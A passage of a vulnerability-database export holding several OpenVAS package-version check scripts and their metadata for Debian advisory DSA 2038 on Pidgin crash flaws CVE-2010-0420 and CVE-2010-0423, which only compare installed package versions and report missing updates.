script_cve_id(\"CVE-2010-0420\", \"CVE-2010-0423\");\n script_name(\"Debian Security Advisory DSA 2038-2 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"pidgin-data\", ver:\"2.4.3-4lenny7\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-dev\", ver:\"2.4.3-4lenny7\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"finch-dev\", ver:\"2.4.3-4lenny7\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpurple-bin\", ver:\"2.4.3-4lenny7\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpurple-dev\", ver:\"2.4.3-4lenny7\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpurple0\", ver:\"2.4.3-4lenny7\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"finch\", ver:\"2.4.3-4lenny7\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin\", ver:\"2.4.3-4lenny7\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-dbg\", ver:\"2.4.3-4lenny7\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:07", "references": [], "pluginID": "67400", "description": "The remote host is missing an update to pidgin\nannounced via advisory DSA 2038-2.", "edition": 2, "reporter": "Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com", "published": "2010-06-03T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Debian Security Advisory DSA 2038-2 (pidgin)", "type": "openvas", "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0423"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=67400", "id": "OPENVAS:67400", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2038_2.nasl 6614 2017-07-07 12:09:12Z cfischer $\n# Description: Auto-generated from advisory DSA 2038-2 (pidgin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The packages for Pidgin released as DSA 2038-1 had a regression, as they\nunintentionally disabled the Zephyr instant messaging protocol. This\nupdate restores Zephyr functionality. For reference the original\nadvisory text below.\n\nSeveral remote vulnerabilities have been discovered in Pidgin, a multi\nprotocol instant messaging client. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2010-0420\n\nCrafted nicknames in the XMPP protocol can crash Pidgin remotely.\n\nCVE-2010-0423\n\nRemote contacts may send too many custom smilies, crashing Pidgin.\n\nSince a few months, Microsoft's servers for MSN have changed the protocol,\nmaking Pidgin non-functional for use with MSN. It is not feasible to port\nthese changes to the version of Pidgin in Debian Lenny. This update\nformalises that situation by disabling the protocol in the client. Users\nof the MSN protocol are advised to use the version of Pidgin in the\nrepositories of www.backports.org.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.4.3-4lenny7.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.6.6-1.\n\nWe recommend that you upgrade your pidgin package.\";\ntag_summary = \"The remote host is missing an update to pidgin\nannounced via advisory DSA 2038-2.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202038-2\";\n\n\nif(description)\n{\n script_id(67400);\n script_version(\"$Revision: 6614 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:12 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-03 22:55:24 +0200 (Thu, 03 Jun 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2010-0420\", \"CVE-2010-0423\");\n script_name(\"Debian Security Advisory DSA 2038-2 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"pidgin-data\", ver:\"2.4.3-4lenny7\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-dev\", ver:\"2.4.3-4lenny7\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"finch-dev\", ver:\"2.4.3-4lenny7\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpurple-bin\", ver:\"2.4.3-4lenny7\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpurple-dev\", ver:\"2.4.3-4lenny7\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpurple0\", ver:\"2.4.3-4lenny7\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"finch\", ver:\"2.4.3-4lenny7\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin\", ver:\"2.4.3-4lenny7\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-dbg\", ver:\"2.4.3-4lenny7\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:09", "references": [], "pluginID": "67339", "description": "The remote host is missing an update to pidgin\nannounced via advisory DSA 2038-1.", "edition": 2, "reporter": "Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com", "published": "2010-05-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Debian Security Advisory DSA 2038-1 (pidgin)", "type": "openvas", "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0423"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=67339", "id": "OPENVAS:67339", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2038_1.nasl 6614 2017-07-07 12:09:12Z cfischer $\n# Description: Auto-generated from advisory DSA 2038-1 (pidgin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several remote vulnerabilities have been discovered in Pidgin, a multi\nprotocol instant messaging client. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2010-0420\n\nCrafted nicknames in the XMPP protocol can crash Pidgin remotely.\n\nCVE-2010-0423\n\nRemote contacts may send too many custom smilies, crashing Pidgin.\n\nSince a few months, Microsoft's servers for MSN have changed the protocol,\nmaking Pidgin non-functional for use with MSN. It is not feasible to port\nthese changes to the version of Pidgin in Debian Lenny. This update\nformalises that situation by disabling the protocol in the client. Users\nof the MSN protocol are advised to use the version of Pidgin in the\nrepositories of www.backports.org.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.4.3-4lenny6.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.6.6-1.\n\nWe recommend that you upgrade your pidgin package.\";\ntag_summary = \"The remote host is missing an update to pidgin\nannounced via advisory DSA 2038-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202038-1\";\n\n\nif(description)\n{\n script_id(67339);\n script_version(\"$Revision: 6614 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:12 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-05-04 05:52:15 +0200 (Tue, 04 May 2010)\");\n script_cve_id(\"CVE-2010-0420\", \"CVE-2010-0423\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Debian Security Advisory DSA 2038-1 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"pidgin-data\", ver:\"2.4.3-4lenny6\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"finch-dev\", ver:\"2.4.3-4lenny6\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpurple-bin\", ver:\"2.4.3-4lenny6\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpurple-dev\", ver:\"2.4.3-4lenny6\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-dev\", ver:\"2.4.3-4lenny6\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpurple0\", ver:\"2.4.3-4lenny6\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin\", ver:\"2.4.3-4lenny6\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"finch\", ver:\"2.4.3-4lenny6\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-dbg\", ver:\"2.4.3-4lenny6\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:55:42", "references": [], "pluginID": "68661", "description": "The remote host is missing an update to pidgin\nannounced via advisory DSA 2038-3.", "edition": 2, "reporter": "Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com", "published": "2011-01-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Debian Security Advisory DSA 2038-3 (pidgin)", "type": "openvas", "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0423"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=68661", "id": "OPENVAS:68661", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2038_3.nasl 6613 2017-07-07 12:08:40Z cfischer $\n# Description: Auto-generated from advisory DSA 2038-3 (pidgin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The packages for Pidgin released as DSA 2038-2 had a regression, as they\nunintentionally disabled the Silc, Simple, and Yahoo instant messaging\nprotocols. This update restore that functionality. For reference the\noriginal advisory text below.\n\nSeveral remote vulnerabilities have been discovered in Pidgin, a multi\nprotocol instant messaging client. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2010-0420\n\nCrafted nicknames in the XMPP protocol can crash Pidgin remotely.\n\nCVE-2010-0423\n\nRemote contacts may send too many custom smilies, crashing Pidgin.\n\nSince a few months, Microsoft's servers for MSN have changed the protocol,\nmaking Pidgin non-functional for use with MSN. It is not feasible to port\nthese changes to the version of Pidgin in Debian Lenny. This update\nformalises that situation by disabling the protocol in the client. Users\nof the MSN protocol are advised to use the version of Pidgin in the\nrepositories of www.backports.org.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.4.3-4lenny8.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.6.6-1.\n\nWe recommend that you upgrade your pidgin package.\";\ntag_summary = \"The remote host is missing an update to pidgin\nannounced via advisory DSA 2038-3.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202038-3\";\n\n\nif(description)\n{\n script_id(68661);\n script_version(\"$Revision: 6613 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:40 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-01-24 17:55:59 +0100 (Mon, 24 Jan 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2010-0420\", \"CVE-2010-0423\");\n script_name(\"Debian Security Advisory DSA 2038-3 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libpurple-dev\", ver:\"2.4.3-4lenny8\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpurple-bin\", ver:\"2.4.3-4lenny8\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-data\", ver:\"2.4.3-4lenny8\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"finch-dev\", ver:\"2.4.3-4lenny8\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-dev\", ver:\"2.4.3-4lenny8\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-dbg\", ver:\"2.4.3-4lenny8\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"finch\", ver:\"2.4.3-4lenny8\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin\", ver:\"2.4.3-4lenny8\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpurple0\", ver:\"2.4.3-4lenny8\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-26T11:05:31", "references": [], "pluginID": "136141256231067339", "description": "The remote host is missing an update to pidgin\nannounced via advisory DSA 2038-1.", "edition": 1, "reporter": "Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com", "published": "2010-05-04T00:00:00", "title": "Debian Security Advisory DSA 2038-1 (pidgin)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0423"], "modified": "2018-01-25T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231067339", "id": "OPENVAS:136141256231067339", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2038_1.nasl 8528 2018-01-25 07:57:36Z teissa $\n# Description: Auto-generated from advisory DSA 2038-1 (pidgin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several remote vulnerabilities have been discovered in Pidgin, a multi\nprotocol instant messaging client. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2010-0420\n\nCrafted nicknames in the XMPP protocol can crash Pidgin remotely.\n\nCVE-2010-0423\n\nRemote contacts may send too many custom smilies, crashing Pidgin.\n\nSince a few months, Microsoft's servers for MSN have changed the protocol,\nmaking Pidgin non-functional for use with MSN. It is not feasible to port\nthese changes to the version of Pidgin in Debian Lenny. This update\nformalises that situation by disabling the protocol in the client. Users\nof the MSN protocol are advised to use the version of Pidgin in the\nrepositories of www.backports.org.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.4.3-4lenny6.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.6.6-1.\n\nWe recommend that you upgrade your pidgin package.\";\ntag_summary = \"The remote host is missing an update to pidgin\nannounced via advisory DSA 2038-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202038-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.67339\");\n script_version(\"$Revision: 8528 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-25 08:57:36 +0100 (Thu, 25 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-05-04 05:52:15 +0200 (Tue, 04 May 2010)\");\n script_cve_id(\"CVE-2010-0420\", \"CVE-2010-0423\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Debian Security Advisory DSA 2038-1 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"pidgin-data\", ver:\"2.4.3-4lenny6\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"finch-dev\", ver:\"2.4.3-4lenny6\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpurple-bin\", ver:\"2.4.3-4lenny6\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpurple-dev\", ver:\"2.4.3-4lenny6\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-dev\", ver:\"2.4.3-4lenny6\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpurple0\", ver:\"2.4.3-4lenny6\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin\", ver:\"2.4.3-4lenny6\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"finch\", ver:\"2.4.3-4lenny6\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-dbg\", ver:\"2.4.3-4lenny6\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:36:12", "references": [], "pluginID": "136141256231068661", "description": "The remote host is missing an update to pidgin\nannounced via advisory DSA 2038-3.", "edition": 1, "reporter": "Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com", "published": "2011-01-24T00:00:00", "title": "Debian Security Advisory DSA 2038-3 (pidgin)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0423"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231068661", "id": "OPENVAS:136141256231068661", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2038_3.nasl 9351 2018-04-06 07:05:43Z cfischer $\n# Description: Auto-generated from advisory DSA 2038-3 (pidgin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The packages for Pidgin released as DSA 2038-2 had a regression, as they\nunintentionally disabled the Silc, Simple, and Yahoo instant messaging\nprotocols. This update restore that functionality. For reference the\noriginal advisory text below.\n\nSeveral remote vulnerabilities have been discovered in Pidgin, a multi\nprotocol instant messaging client. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2010-0420\n\nCrafted nicknames in the XMPP protocol can crash Pidgin remotely.\n\nCVE-2010-0423\n\nRemote contacts may send too many custom smilies, crashing Pidgin.\n\nSince a few months, Microsoft's servers for MSN have changed the protocol,\nmaking Pidgin non-functional for use with MSN. It is not feasible to port\nthese changes to the version of Pidgin in Debian Lenny. This update\nformalises that situation by disabling the protocol in the client. Users\nof the MSN protocol are advised to use the version of Pidgin in the\nrepositories of www.backports.org.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.4.3-4lenny8.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.6.6-1.\n\nWe recommend that you upgrade your pidgin package.\";\ntag_summary = \"The remote host is missing an update to pidgin\nannounced via advisory DSA 2038-3.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202038-3\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.68661\");\n script_version(\"$Revision: 9351 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:05:43 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-01-24 17:55:59 +0100 (Mon, 24 Jan 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2010-0420\", \"CVE-2010-0423\");\n script_name(\"Debian Security Advisory DSA 2038-3 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libpurple-dev\", ver:\"2.4.3-4lenny8\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpurple-bin\", ver:\"2.4.3-4lenny8\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-data\", ver:\"2.4.3-4lenny8\", 